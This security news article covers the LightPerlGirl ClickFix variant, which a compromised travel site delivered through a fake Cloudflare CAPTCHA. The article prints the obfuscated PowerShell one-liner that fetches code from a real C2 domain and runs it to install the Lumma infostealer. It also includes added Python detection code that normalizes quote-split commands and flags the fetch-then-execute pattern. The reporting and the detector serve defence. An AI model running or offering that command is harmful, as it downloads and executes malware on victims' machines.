Researchers have discovered a novel ClickFix variant, named LightPerlGirl.
ClickFix uses social engineering to trick users into running malware on their own devices through living-off-the-land binaries (LOLBins), in this case PowerShell. With evasion built into the ClickFix code and the PowerShell payload executed in memory, the presence of ClickFix malware is easily missed.
On June 13, 2025, researchers at Todyl, a networking and security platform for MSPs, detected a ClickFix variant that had not previously been seen. It was found on a compromised WordPress travel site being used in a traditional watering-hole attack.
Visitors to the site seeking a holiday in the Galapagos would receive a pop-up dialog box purporting to be part of Cloudflare’s CAPTCHA security process. The social engineering process is not new, being similar to that used in the variant discussed by SlashNext in early June.
Both attacks aim to persuade the user that similar additional steps are required to complete Cloudflare’s Turnstile CAPTCHA process. In this new example, a banner at the bottom of the box claims ‘Performance & Security by Cloudflare’.
The visitor is required to press ‘Windows + R’ followed by ‘CTRL + V’ followed by ‘OK’. By this time the compromised website has already loaded the first PowerShell command into the user’s clipboard. The Run dialog box is opened, ClickFix is pasted into it, and the code is executed.
The first command is heavily obfuscated, so even if briefly seen by the visitor, it will probably be unrecognizable. The obfuscated command is seen by a human as:
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nOp -w h -C "$rb"l"d30 = 'cmb"k"z"8kz1"0"0"01"0"8k2"ca"rj"ew"z"f.inf"o'; $v"nr"l"01" = Invo"k"e"-"RestM"e"th"o"d -Uri $rb"l"d"3"0; I"nvo"k"e-E"xp"ress"i"o"n $v"n"r"l0"1"
But the Windows command-line parser strips the unescaped double quotes before PowerShell ever receives its arguments, so the command is seen and interpreted by the computer as:
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nOp -w h -C $rbld30 = 'cmbkz8kz1000108k2carjewzf.info';
$vnrl01 = Invoke-RestMethod -Uri $rbld30; Invoke-Expression $vnrl01
This command uses PowerShell's Invoke-RestMethod to contact a separate C2 domain (cmbkz8kz1000108k2carjewzf[.]info). The response from the C2 is then executed by PowerShell's Invoke-Expression.
Todyl's researchers found and executed this ClickFix. They discovered that the ultimate malware payload delivered is the Lumma infostealer, but they have many unanswered questions. For example, is the Russia-based source of Lumma (known as 'Shamel') also the source of this ClickFix; is a separate developer of this ClickFix using Lumma as a service; or are both ends of the equation affiliates of different as-a-service sources? How widespread is this variant? What is the criminal infrastructure?
Todyl will continue to research LightPerlGirl. (The name comes from a surprising copyright notice within the ClickFix code: “(Copyright (c) LightPerlGirl 2025)”.) “We believe it is a brand new and novel campaign,” David Langlands, Todyl’s CSO, told SecurityWeek. His wider research into the extent of LightPerlGirl’s use and the infrastructure it uses will take a while — but since the malware is already in the wild, he decided to publish details of the current code immediately, complete with known IOCs.
Malicious use of PowerShell can be detected by the latest security tools, but ClickFix attempts to avoid them. The watering-hole attack method, which can be supported by malvertising, is not a finely targeted attack. The adversaries have no control over who may visit the site and become infected. However, a compromised travel site would attract individuals wealthy enough to seek an expensive vacation (the Galapagos), and they would likely browse it from home on their own PC. Such devices are not often protected by modern EDR, so the ClickFix use of LOLBins would pass unseen.
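The quote-splitting shown in the command above is trivial to undo, and the same normalization gives a defender a way to match the fetch-then-execute pattern that evades the casual glance. The following is an added example, not Todyl's or SecurityWeek's code: it applies the Windows command-line parser's quote stripping to a process-creation record, then scores the normalized command for the signals visible in the article's sample (hidden window, no profile, Invoke-RestMethod, Invoke-Expression, a Run-dialog parent). The Sysmon-style records, the field names and the C2 domain are constructed placeholders, and the score thresholds are assumptions, not tuned values.

```python
"""Added example, not Todyl's or SecurityWeek's code: normalize a quote-split
PowerShell command line the way the Windows command-line parser does, then
score it for the download-and-execute pattern described in the article.
Input is a Sysmon-style process-creation record (CommandLine, ParentImage);
the sample records below are constructed and the C2 domain is a placeholder."""
import re

# CommandLineToArgvW drops unescaped double quotes, so a quote-split token such
# as  Invo"k"e"-"RestM"e"th"o"d  reaches PowerShell as  Invoke-RestMethod.
# Curly quotes, double primes and en/em dashes are folded too, because commands
# copied from web pages and reports often carry them.  (\" escapes are not
# modelled; the assumption is a plain Run-dialog launch as in the article.)
_QUOTE_CHARS = '"\u201c\u201d\u2033'
_DASH_CHARS = "\u2013\u2014"

def normalize_cmdline(cmdline: str) -> tuple[str, int]:
    """Return (command line as PowerShell would see it, quote chars removed)."""
    removed = sum(cmdline.count(c) for c in _QUOTE_CHARS)
    out = cmdline
    for c in _QUOTE_CHARS:
        out = out.replace(c, "")
    for d in _DASH_CHARS:
        out = out.replace(d, "-")
    return out, removed

# Signals taken from the command shown in the article: hidden window,
# no profile, a remote fetch, and dynamic execution of the fetched text.
_SIGNALS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "remote_fetch": re.compile(
        r"\b(?:Invoke-RestMethod|Invoke-WebRequest|irm|iwr|DownloadString)\b", re.I),
    "dynamic_exec": re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I),
}
QUOTE_OBFUSCATION_MIN = 6  # assumed heuristic: a quoted path needs 2, one-liners rarely more

def score_cmdline(cmdline: str, parent_image: str = "") -> dict:
    """Normalize one process-creation record and return the matched signals."""
    norm, removed = normalize_cmdline(cmdline)
    hits = {name: bool(rx.search(norm)) for name, rx in _SIGNALS.items()}
    # A Win+R launch (the ClickFix instruction) has explorer.exe as its parent.
    hits["run_dialog_parent"] = parent_image.lower().endswith("\\explorer.exe")
    hits["quote_obfuscation"] = removed >= QUOTE_OBFUSCATION_MIN
    score = sum(hits.values())
    if hits["remote_fetch"] and hits["dynamic_exec"]:
        verdict = "suspicious"  # fetch-then-execute is the core of the chain
    elif score >= 3:
        verdict = "review"
    else:
        verdict = "benign"
    return {"normalized": norm, "quotes_removed": removed,
            "signals": hits, "score": score, "verdict": verdict}

# Constructed sample records.  The first mirrors the article's quote-split
# structure with a placeholder domain; the second is an ordinary admin command.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'''"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nOp -w h -C "$rb"l"d30 = 'c2-"pl"ace"holder.exa"mple'; $v"nr"l"01" = Invo"k"e"-"RestM"e"th"o"d -Uri $rb"l"d"3"0; I"nvo"k"e-E"xp"ress"i"o"n $v"n"r"l0"1"'''},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell.exe -NoProfile -Command "Get-ChildItem C:\logs | Measure-Object"'},
]

def triage(events: list[dict]) -> list[dict]:
    """Score every record; returns one result per event in input order."""
    return [score_cmdline(e["CommandLine"], e.get("ParentImage", "")) for e in events]

if __name__ == "__main__":
    for res in triage(SAMPLE_EVENTS):
        flagged = [k for k, v in res["signals"].items() if v]
        print(f"{res['verdict']:10} score={res['score']} {flagged}")
        print("   ", res["normalized"][:90])
```

Normalizing before matching is the point: a rule written against the raw command line would have to anticipate every way the attacker can split a cmdlet name, whereas a rule run on the argv-stripped text sees the same Invoke-RestMethod and Invoke-Expression the machine executes. The quote count itself is a useful secondary signal, since legitimate one-liners seldom need dozens of double quotes.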
The result would be a well-off individual, possibly a company executive, unknowingly infected by an infostealer which could subsequently and potentially learn from the personal computer how to access the employer’s enterprise network. This is the real danger of ClickFix: the compromise of individual employees ultimately leading to the compromise of major employer enterprises.
Todyl only found this new ClickFix variant because one of its corporate customers happened to visit the infected website. An attack that normally avoids exposure to modern detection systems was discovered almost accidentally.
Related: Russia-Linked APT Star Blizzard Uses ClickFix to Deploy New LostKeys Malware, Google Warns
Related: Lazarus Uses ClickFix Tactics in Fake Cryptocurrency Job Attacks
Related: ClickFix Widely Adopted by Cybercriminals, APT Groups
Related: Microsoft Warns of Hospitality Sector Attacks Involving ClickFix
